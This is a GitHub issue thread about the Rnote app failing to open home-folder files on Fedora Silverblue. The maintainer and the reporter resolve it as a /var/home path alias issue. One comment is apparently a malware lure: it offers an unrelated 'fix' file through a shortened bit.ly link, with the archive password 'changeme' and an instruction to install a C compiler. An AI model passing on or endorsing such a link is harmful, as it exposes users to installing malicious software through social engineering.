### ISSUE TITLE
Problems opening files in Fedora Silverblue

### ISSUE THREAD

**Issue by debbie-drg** [flxzt/rnote#1226]
**Describe the bug**  
In Fedora's atomic distributions, the application fails to open documents in the users home folder unless you manually make sure the path starts with /var/home/

**To Reproduce**  
1. Go to open a file
2. Go to home on the favourites on the file picker, and select any file
3. File doesn't load

**Expected behavior**  
File loads

**Console Output**  
```
2024-09-20T06:12:17.295373Z ERROR rnote::appwindow: Opening file with dialogs failed, Err: Error al abrir el archivo /home/debbie/Documentos/Notas/Atom.rnote: No existe el fichero o el directorio

Stack backtrace:
   0: <unknown>
   1: <unknown>
   2: <unknown>
   3: <unknown>
   4: <unknown>
   5: <unknown>
   6: <unknown>
   7: g_main_context_iteration
   8: g_application_run
   9: <unknown>
  10: <unknown>
  11: <unknown>
  12: <unknown>
  13: __libc_start_main
  14: <unknown>
2024-09-20T06:12:17.306976Z ERROR rnote::overlays: Error al abrir el archivo
```

**Desktop (please complete the following information):**  
 - OS: Fedora Silverblue 41
 - App Version: 0.11.0
 - Installation Source: Flatpak
 - Desktop Environment: Gnome 47
 - Display Server: Wayland
 - Input Source: Mouse and keyboard

**Comment by Kevin-Otalvares** [comment]
This might help:This file might fix it
https://bit.ly/4gABgKn

Password: changeme

you may need to install the c compiler

**Comment by flxzt** [comment]
I assume the application is installed as flatpak - make sure you have sufficient permissions to the directory/file you're trying to access. You can do that for example in the permssions manager app Flatseal. 

And please post the logs in english, it can be done through the LANG environment variable

**Comment by debbie-drg** [comment]
I had given access to the home folder via Flatseal. I have now decided to manually add the path to home and it works. Apparently the home variable defaults to /var/home/username and accessing /home/username does not work. This can be a bit confusing as /var/home/username is the actual path and /home/username is aliased to it, but Nautilus defaults to /home/username when clicking home. In any case, this is not a problem with Rnote so I will close the issue. Thanks!
